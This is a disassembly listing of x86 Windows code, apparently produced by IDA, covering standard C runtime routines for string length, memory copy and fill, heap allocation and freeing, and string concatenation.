sub_4290F9 proc near ; CODE XREF: sub_41B35A+13�p
; sub_41B494+E�p
; FUNCTION CHUNK AT 00429189 SIZE 0000000C BYTES
mov eax, offset loc_4365EC
call sub_42B6FC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B427
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_4292D0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_41B45F
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B189
lea eax, [ebp-3Ch]
push offset dword_438474
push eax
mov dword ptr [ebp-3Ch], offset off_4373D4
call sub_42B82A
pop esi
loc_429153: ; DATA XREF: .text:0043A00C�o
test byte_676C78, 1
jnz short loc_429163
or byte_676C78, 1
loc_429163: ; CODE XREF: sub_4290F9+61�j
call sub_42917D
test byte_676C79, 1
jnz short loc_429178
or byte_676C79, 1
loc_429178: ; CODE XREF: sub_4290F9+76�j
jmp loc_429189
sub_4290F9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42917D proc near ; CODE XREF: sub_4290F9:loc_429163�p
push offset nullsub_1
call sub_42B799
pop ecx
retn
sub_42917D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290F9
loc_429189: ; CODE XREF: sub_4290F9:loc_429178�j
push offset nullsub_1
call sub_42B799
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4290F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429196 proc near ; CODE XREF: sub_423BB1+10A�p
; sub_423BB1+1C3�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_429205
retn 4
sub_429196 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4291A4 proc near ; CODE XREF: sub_423BB1+12D�p
; sub_423BB1+239�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_4291F6
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_450E00
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_4291F6
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_4291F6
lea eax, [ebp+var_4]
push eax
push 0
call dword_437250
test eax, eax
jz short loc_4291F6
and [ebp+var_4], 0
loc_4291F6: ; CODE XREF: sub_4291A4+D�j
; sub_4291A4+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_429205
leave
retn 0Ch
sub_4291A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429205 proc near ; CODE XREF: sub_429196+6�p
; sub_4291A4+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_429229
lea eax, [ebp+var_10]
push offset dword_4386E8
push eax
call sub_42B82A
sub_429205 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429229 proc near ; CODE XREF: sub_429205+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4373FC
test eax, eax
mov [esi+8], eax
jz short loc_429255
cmp [esp+4+arg_8], 0
jz short loc_429255
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_429255: ; CODE XREF: sub_429229+1D�j
; sub_429229+24�j
mov eax, esi
pop esi
retn 0Ch
sub_429229 endp
; =============== S U B R O U T I N E =======================================
sub_42925B proc near ; DATA XREF: .text:off_4373FC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4292A4
test [esp+4+arg_0], 1
jz short loc_429271
push esi
call sub_429006
pop ecx
loc_429271: ; CODE XREF: sub_42925B+D�j
mov eax, esi
pop esi
retn 4
sub_42925B endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4373FC
jz short loc_42929E
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_42929E: ; CODE XREF: .text:00429296�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4292A4 proc near ; CODE XREF: sub_42925B+3�p
; DATA XREF: .text:004386EC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4373FC
test eax, eax
jz short loc_4292BA
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4292BA: ; CODE XREF: sub_4292A4+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_4292C8
push esi
call dword_43703C ; LocalFree
loc_4292C8: ; CODE XREF: sub_4292A4+1B�j
pop esi
retn
sub_4292A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4292D0 proc near ; CODE XREF: sub_4011E4+7�p
; sub_401B6E+29A�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4292F0
loc_4292DC: ; CODE XREF: sub_4292D0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_429323
test ecx, 3
jnz short loc_4292DC
add eax, 0
loc_4292F0: ; CODE XREF: sub_4292D0+A�j
; sub_4292D0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4292F0
mov eax, [ecx-4]
test al, al
jz short loc_429341
test ah, ah
jz short loc_429337
test eax, 0FF0000h
jz short loc_42932D
test eax, 0FF000000h
jz short loc_429323
jmp short loc_4292F0
; ---------------------------------------------------------------------------
loc_429323: ; CODE XREF: sub_4292D0+11�j
; sub_4292D0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_42932D: ; CODE XREF: sub_4292D0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_429337: ; CODE XREF: sub_4292D0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_429341: ; CODE XREF: sub_4292D0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4292D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429350 proc near ; CODE XREF: sub_40100A+25�p
; sub_401044+2E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_429370
cmp edi, eax
jb loc_4294E8
loc_429370: ; CODE XREF: sub_429350+16�j
test edi, 3
jnz short loc_42938C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4293AC
rep movsd
jmp off_429498[edx*4]
; ---------------------------------------------------------------------------
loc_42938C: ; CODE XREF: sub_429350+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4293A4
and eax, 3
add ecx, eax
jmp dword ptr loc_4293AC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4293A4: ; CODE XREF: sub_429350+46�j
jmp dword ptr loc_4294A8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4293AC: ; CODE XREF: sub_429350+31�j
; sub_429350+8E�j ...
jmp off_42942C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4293BC+4
dd offset loc_4293EC
; ---------------------------------------------------------------------------
loc_4293BC: ; DATA XREF: sub_429350+64�o
adc [edx+eax*2-752EDD00h], dl
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4293AC
rep movsd
jmp off_429498[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4293EC: ; DATA XREF: sub_429350+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4293AC
rep movsd
jmp off_429498[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4293AC
rep movsd
jmp off_429498[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42942C dd offset loc_42948F ; DATA XREF: sub_429350:loc_4293AC�r
dd offset loc_42947C
dd offset loc_429474
dd offset loc_42946C
dd offset loc_429464
dd offset loc_42945C
dd offset loc_429454
dd offset loc_42944C
; ---------------------------------------------------------------------------
loc_42944C: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_429454: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_42945C: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_429464: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42946C: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_429474: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42947C: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42948F: ; CODE XREF: sub_429350:loc_4293AC�j
; DATA XREF: sub_429350:off_42942C�o
jmp off_429498[edx*4]
; ---------------------------------------------------------------------------
align 4
off_429498 dd offset loc_4294A8 ; DATA XREF: sub_429350+35�r
; sub_429350+92�r ...
dd offset loc_4294B0
dd offset loc_4294BC
dd offset loc_4294D0
; ---------------------------------------------------------------------------
loc_4294A8: ; CODE XREF: sub_429350+35�j
; sub_429350+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4294B0: ; CODE XREF: sub_429350+35�j
; sub_429350+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4294BC: ; CODE XREF: sub_429350+35�j
; sub_429350+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4294D0: ; CODE XREF: sub_429350+35�j
; sub_429350+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4294E8: ; CODE XREF: sub_429350+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_42951C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_429510
std
rep movsd
cld
jmp off_429630[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_429510: ; CODE XREF: sub_429350+1B1�j
; sub_429350+208�j ...
neg ecx
jmp off_4295E0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42951C: ; CODE XREF: sub_429350+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_429534
and eax, 3
sub ecx, eax
jmp dword ptr loc_429534+4[eax*4]
; ---------------------------------------------------------------------------
loc_429534: ; CODE XREF: sub_429350+1D6�j
; DATA XREF: sub_429350+1DD�r
jmp off_429630[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_429547+1
; ---------------------------------------------------------------------------
push 90004295h
xchg eax, ebp
inc edx
loc_429547: ; DATA XREF: sub_429350+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_429510
std
rep movsd
cld
jmp off_429630[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_429510
std
rep movsd
cld
jmp off_429630[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_429510
std
rep movsd
cld
jmp off_429630[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4295E4
dd offset loc_4295EC
dd offset loc_4295F4
dd offset loc_4295FC
dd offset loc_429604
dd offset loc_42960C
dd offset loc_429614
off_4295E0 dd offset loc_429627 ; DATA XREF: sub_429350+1C2�r
; ---------------------------------------------------------------------------
loc_4295E4: ; DATA XREF: sub_429350+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4295EC: ; DATA XREF: sub_429350+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4295F4: ; DATA XREF: sub_429350+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4295FC: ; DATA XREF: sub_429350+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_429604: ; DATA XREF: sub_429350+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_42960C: ; DATA XREF: sub_429350+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_429614: ; DATA XREF: sub_429350+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_429627: ; CODE XREF: sub_429350+1C2�j
; DATA XREF: sub_429350:off_4295E0�o
jmp off_429630[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_429630 dd offset loc_429640 ; DATA XREF: sub_429350+1B7�r
; sub_429350:loc_429534�r ...
dd offset loc_429648
dd offset loc_429658
dd offset loc_42966C
; ---------------------------------------------------------------------------
loc_429640: ; CODE XREF: sub_429350+1B7�j
; sub_429350:loc_429534�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_429648: ; CODE XREF: sub_429350+1B7�j
; sub_429350:loc_429534�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_429658: ; CODE XREF: sub_429350+1B7�j
; sub_429350:loc_429534�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42966C: ; CODE XREF: sub_429350+1B7�j
; sub_429350:loc_429534�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_429350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429690 proc near ; CODE XREF: sub_40100A+1A�p
; sub_401044+22�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4296E3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4296D7
neg ecx
and ecx, 3
jz short loc_4296B9
sub edx, ecx
loc_4296B3: ; CODE XREF: sub_429690+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4296B3
loc_4296B9: ; CODE XREF: sub_429690+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4296D7
rep stosd
test edx, edx
jz short loc_4296DD
loc_4296D7: ; CODE XREF: sub_429690+18�j
; sub_429690+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4296D7
loc_4296DD: ; CODE XREF: sub_429690+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4296E3: ; CODE XREF: sub_429690+A�j
mov eax, [esp+arg_0]
retn
sub_429690 endp
; =============== S U B R O U T I N E =======================================
sub_4296E8 proc near ; CODE XREF: sub_40100A+A�p
; sub_401044+12�p ...
arg_0 = dword ptr 4
push dword_676910
push [esp+4+arg_0]
call sub_4296FA
pop ecx
pop ecx
retn
sub_4296E8 endp
; =============== S U B R O U T I N E =======================================
sub_4296FA proc near ; CODE XREF: sub_4296E8+A�p
; sub_42B407+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_429723
loc_429701: ; CODE XREF: sub_4296FA+27�j
push [esp+arg_0]
call sub_429726
test eax, eax
pop ecx
jnz short locret_429725
cmp [esp+arg_4], eax
jz short locret_429725
push [esp+arg_0]
call sub_42C5F5
test eax, eax
pop ecx
jnz short loc_429701
loc_429723: ; CODE XREF: sub_4296FA+5�j
xor eax, eax
locret_429725: ; CODE XREF: sub_4296FA+13�j
; sub_4296FA+19�j
retn
sub_4296FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429726 proc near ; CODE XREF: sub_4296FA+B�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00429796 SIZE 00000053 BYTES
; FUNCTION CHUNK AT 004297F5 SIZE 0000002D BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437400
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov eax, dword_676FE4
cmp eax, 3
jnz short loc_429796
mov esi, [ebp+arg_0]
cmp esi, dword_676FDC
ja loc_4297F5
push 9
call sub_42DA1F
pop ecx
and [ebp+var_4], 0
push esi
call sub_42CB7E
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_42978D
mov eax, [ebp+var_1C]
test eax, eax
jz short loc_4297F5
jmp loc_429813
sub_429726 endp
; =============== S U B R O U T I N E =======================================
sub_42978D proc near ; CODE XREF: sub_429726+56�p
; DATA XREF: .text:00437408�o
push 9
call sub_42DA80
pop ecx
retn
sub_42978D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429726
loc_429796: ; CODE XREF: sub_429726+2B�j
cmp eax, 2
jnz short loc_4297F5
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_4297AA
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_4297AD
; ---------------------------------------------------------------------------
loc_4297AA: ; CODE XREF: sub_429726+7A�j
push 10h
pop esi
loc_4297AD: ; CODE XREF: sub_429726+82�j
mov [ebp+arg_0], esi
cmp esi, dword_453154
ja short loc_4297E6
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
mov eax, esi
shr eax, 4
push eax
call sub_42D621
pop ecx
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_4297EC
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_429813
loc_4297E6: ; CODE XREF: sub_429726+90�j
push esi
jmp short loc_429805
; END OF FUNCTION CHUNK FOR sub_429726
; =============== S U B R O U T I N E =======================================
sub_4297E9 proc near ; DATA XREF: .text:00437414�o
mov esi, [ebp+8]
sub_4297E9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4297EC proc near ; CODE XREF: sub_429726+B4�p
push 9
call sub_42DA80
pop ecx
retn
sub_4297EC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429726
loc_4297F5: ; CODE XREF: sub_429726+36�j
; sub_429726+60�j ...
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_4297FF
push 1
pop eax
loc_4297FF: ; CODE XREF: sub_429726+D4�j
add eax, 0Fh
and al, 0F0h
push eax
loc_429805: ; CODE XREF: sub_429726+C1�j
push 0
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
loc_429813: ; CODE XREF: sub_429726+62�j
; sub_429726+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_429726
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429822 proc near ; CODE XREF: sub_401099+A�p
; sub_4010B2+73�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00429895 SIZE 0000004F BYTES
; FUNCTION CHUNK AT 004298ED SIZE 0000001E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437418
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4298FC
mov eax, dword_676FE4
cmp eax, 3
jnz short loc_429895
push 9
call sub_42DA1F
pop ecx
and [ebp+var_4], 0
push esi
call sub_42C82A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_42987D
push esi
push eax
call sub_42C855
pop ecx
pop ecx
loc_42987D: ; CODE XREF: sub_429822+50�j
or [ebp+var_4], 0FFFFFFFFh
call sub_42988C
cmp [ebp+var_1C], 0
jmp short loc_4298DD
sub_429822 endp
; =============== S U B R O U T I N E =======================================
sub_42988C proc near ; CODE XREF: sub_429822+5F�p
; DATA XREF: .text:00437420�o
push 9
call sub_42DA80
pop ecx
retn
sub_42988C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429822
loc_429895: ; CODE XREF: sub_429822+36�j
cmp eax, 2
jnz short loc_4298ED
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
push esi
call sub_42D585
add esp, 0Ch
mov [ebp+var_24], eax
test eax, eax
jz short loc_4298D0
push eax
push [ebp+var_20]
push [ebp+var_28]
call sub_42D5DC
add esp, 0Ch
loc_4298D0: ; CODE XREF: sub_429822+9D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4298E4
cmp [ebp+var_24], 0
loc_4298DD: ; CODE XREF: sub_429822+68�j
jnz short loc_4298FC
push [ebp+arg_0]
jmp short loc_4298EE
; END OF FUNCTION CHUNK FOR sub_429822
; =============== S U B R O U T I N E =======================================
sub_4298E4 proc near ; CODE XREF: sub_429822+B2�p
; DATA XREF: .text:0043742C�o
push 9
call sub_42DA80
pop ecx
retn
sub_4298E4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429822
loc_4298ED: ; CODE XREF: sub_429822+76�j
push esi
loc_4298EE: ; CODE XREF: sub_429822+C0�j
push 0
push dword_676FE0
call dword_437210 ; RtlFreeHeap
loc_4298FC: ; CODE XREF: sub_429822+28�j
; sub_429822:loc_4298DD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_429822
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_429910 proc near ; CODE XREF: sub_401990+66�p
; sub_401990+B4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4299C4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_42993A
loc_42992B: ; CODE XREF: sub_429910+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_42996B
test edi, 3
jnz short loc_42992B
loc_42993A: ; CODE XREF: sub_429910+19�j
; sub_429910+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_42993A
mov eax, [edi-4]
test al, al
jz short loc_429978
test ah, ah
jz short loc_429973
test eax, 0FF0000h
jz short loc_42996E
test eax, 0FF000000h
jnz short loc_42993A
loc_42996B: ; CODE XREF: sub_429910+20�j
dec edi
jmp short loc_42997B
; ---------------------------------------------------------------------------
loc_42996E: ; CODE XREF: sub_429910+52�j
sub edi, 2
jmp short loc_42997B
; ---------------------------------------------------------------------------
loc_429973: ; CODE XREF: sub_429910+4B�j
sub edi, 3
jmp short loc_42997B
; ---------------------------------------------------------------------------
loc_429978: ; CODE XREF: sub_429910+47�j
sub edi, 4
loc_42997B: ; CODE XREF: sub_429910+5C�j
; sub_429910+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_429990
mov ebx, ecx
shr ecx, 2
jnz short loc_4299DC
jmp short loc_4299AC
; ---------------------------------------------------------------------------
loc_429990: ; CODE XREF: sub_429910+75�j
; sub_429910+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_4299CA
mov [edi], dl
inc edi
dec ecx
jz short loc_4299C0
test esi, 3
jnz short loc_429990
mov ebx, ecx
shr ecx, 2
jnz short loc_4299DC
loc_4299AC: ; CODE XREF: sub_429910+7E�j
; sub_429910+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_4299C0
loc_4299B3: ; CODE XREF: sub_429910+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_4299C2
dec ecx
jnz short loc_4299B3
loc_4299C0: ; CODE XREF: sub_429910+8B�j
; sub_429910+A1�j
mov [edi], cl
loc_4299C2: ; CODE XREF: sub_429910+AB�j
pop ebx
pop esi
loc_4299C4: ; CODE XREF: sub_429910+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4299CA: ; CODE XREF: sub_429910+85�j
; sub_429910+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4299D4: ; CODE XREF: sub_429910+E4�j
; sub_429910+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4299AC
loc_4299DC: ; CODE XREF: sub_429910+7C�j
; sub_429910+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4299D4
test dl, dl
jz short loc_4299CA
test dh, dh
jz short loc_429A28
test edx, 0FF0000h
jz short loc_429A18
test edx, 0FF000000h
jnz short loc_4299D4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429A18: ; CODE XREF: sub_429910+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_429A28: ; CODE XREF: sub_429910+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_429910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429A33 proc near ; CODE XREF: sub_401990+22�p
; sub_401990+52�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_42DBAD
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_429A73
